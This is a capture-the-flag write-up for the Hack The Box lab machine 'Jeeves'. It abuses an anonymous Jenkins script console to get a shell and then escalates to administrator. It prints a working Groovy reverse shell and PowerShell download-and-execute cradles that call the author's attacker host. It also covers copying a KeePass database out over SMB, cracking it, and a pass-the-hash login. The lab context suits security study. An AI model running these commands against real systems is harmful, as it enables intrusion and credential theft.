Nmap scan

nmap -sV -p- -oA nmap/allports 10.10.10.63                                                                                        
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 20:18 CDT                                                                                              
Nmap scan report for 10.10.10.63                                                                                                                             
Host is up (0.049s latency).                                                                                                                                 
Not shown: 65531 filtered ports                                                                                                                              
PORT      STATE SERVICE      VERSION                                                                                                                         
80/tcp    open  http         Microsoft IIS httpd 10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)                                                                   
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Port 80 is a rabbit hole that just redirects to a image of a error

Port 50000 just takes us to a bank page

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.63:50000
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.63:50000
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/08/24 20:38:14 Starting gobuster
===============================================================
/askjeeves (Status: 302)

The application is anonymous login so we have a few ways to obtain RCE

  1. Create a new project and insert malicous code into the build script to run during creation. (Loud and not recommended)
  2. Jenkins -> Manage Jenkins -> Script Console

I’m going to be using the 2nd method I listed. The script console uses Groovy script

cmd.exe method

Using this resource I can obtain a cmd.exe reverse shell using groovy script
groovyshell

String host="10.10.14.19";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

powershell.exe method (Using nishang)

cmd = """ powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/shell.ps1')" """
println cmd.execute().text

User.txt e3232272596fb<redacted>

Privesc

PowerUp enumeration

Loading PowerUp into memory
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/PowerUp.ps1')


This is not useful because we can’t restart the service

Invoke-AllChecks
ServiceName                     : jenkins                                                                                                              
Path                            : "C:\Users\Administrator\.jenkins\jenkins.exe"                                                                              
ModifiableFile                  : C:\Users\Administrator\.jenkins\jenkins.exe                                                                                
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}                                                                      
ModifiableFileIdentityReference : JEEVES\kohsuke                                                                                                             
StartName                       : .\kohsuke                                                                                                                  
AbuseFunction                   : Install-ServiceBinary -Name 'jenkins'                                                                                      
CanRestart                      : False 

Found CEH.kdbx at C:\Users\kohsuke\Documents

impacket-smbserver to retrieve file

Create smb share named ‘share’ for anyone to access
Kali: impacket-smbserver share `pwd`

Mount
Victim box: New-PSDrive -Name "anything" -PSProvider "FileSystem" -Root "\\10.10.14.19\share"

Access share from victim: cd anything:

copy CEH.kdbx to our smb share: cp C:\Users\kohsuke\Documents\CEH.kdbx .

Cracking kdbx with JTR

keepass2john CEH.kdbx

john hash2crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
moonshine1       (CEH)

Exploring passwords found from keepass db

passwords.txt

administrator:S1TjAtJHKsugh9oC4VZl
NTLM HASH: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

didn’t work
winexe -U jenkins/administrator%S1TjAtJHKsugh9oC4VZl //10.10.10.63 cmd.exe

Since we have a NTLM hash we can use pth-winexe (passthehash) found to try to auth as administrator
pth-winexe -U jenkins/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe

It worked

Getting root.txt

dir /r
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA

powershell (Get-Content hm.txt -Stream root.txt)

root.txt afbc5bd4b615a6<redacted>